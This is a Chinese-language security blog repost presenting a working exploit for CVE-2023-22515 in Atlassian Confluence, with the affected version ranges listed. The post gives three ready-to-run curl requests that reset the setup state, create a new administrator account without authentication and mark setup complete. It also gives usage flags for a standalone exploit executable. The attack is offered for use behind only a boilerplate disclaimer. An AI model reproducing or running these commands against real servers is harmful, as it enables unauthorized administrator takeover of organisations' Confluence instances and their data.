未授权添加管理员用户漏洞利用工具(CVE-2023-22515)

admin

102523
文章

87
评论

2024年2月24日15:38:04评论31 views字数 887阅读2分57秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01 工具介绍

影响范围：

8.0.0 <= Atlassian Confluence < 8.3.38.4.0 <= Atlassian Confluence < 8.4.38.5.0 <= Atlassian Confluence < 8.5.2

0x02 安装与使用

一、漏洞利用

触发漏洞

curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

创建管理员用户

test123 Password2

执行如下命令

curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action

设置已完成

curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action

二、用法

cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2  -pass string        指定要添加的密码  -proxy string        设置代理  -u string        指定目标  -user string        指定要添加的用户名

未授权添加管理员用户漏洞利用工具(CVE-2023-22515)

0x03 项目链接下载

原文始发于微信公众号（网络安全者）：未授权添加管理员用户漏洞利用工具(CVE-2023-22515)

左青龙
微信扫一扫

右白虎
微信扫一扫

未授权添加管理员用户漏洞利用工具(CVE-2023-22515)

某单位网址未授权导致发生的视频信息泄露

CVE-2024-4040

Craft CMS 远程代码执行漏洞复现（附nuclei POC）

漏洞预警 | Google Chrome堆缓冲区溢出漏洞

漏洞预警 | GeoNode请求伪造漏洞

漏洞预警 | Docker Desktop增强容器隔离限制绕过漏洞

漏洞预警 | D-Link D-View 8 硬编码密钥漏洞

(CVE-2023-30591) NodeBB 预身份验证拒绝服务

CVE-2023-41081：Apache Tomcat 连接器中的高严重性漏洞

禅道项目管理系统身份认证绕过[漏洞复现]

发表评论

在线咨询

微信